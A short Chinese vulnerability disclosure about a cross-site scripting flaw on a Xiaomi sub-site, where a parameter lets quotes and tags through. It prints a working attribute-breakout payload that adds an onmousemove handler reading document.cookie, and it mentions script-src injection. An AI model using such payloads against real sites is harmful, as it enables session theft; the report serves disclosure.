没有过滤单双引号和html标签,只是简单的把'/'或者'\'之后的字符串全部替换为空。
插入的目标区域在一个img里面,首先可以用各种on事件X掉,也可以写一个<script src=>,都无压力了,就这样吧。

 
<a x="'','3866216808','')" onmousemove="javascript:alert(document.cookie);" onclick="shareTSina('来我的“小米手机随手拍”摄影主页,看我用小米拍出的精彩作品。【阿哲哥】','')" href="javascript:void(0)">

小米某分站对参数过滤不严,可以导致XSS


小米某分站对参数过滤不严,可以导致XSS



')" onmousemove="javascript:alert(document.cookie);" x="'
 
 
 
修复方案

像以前那样过滤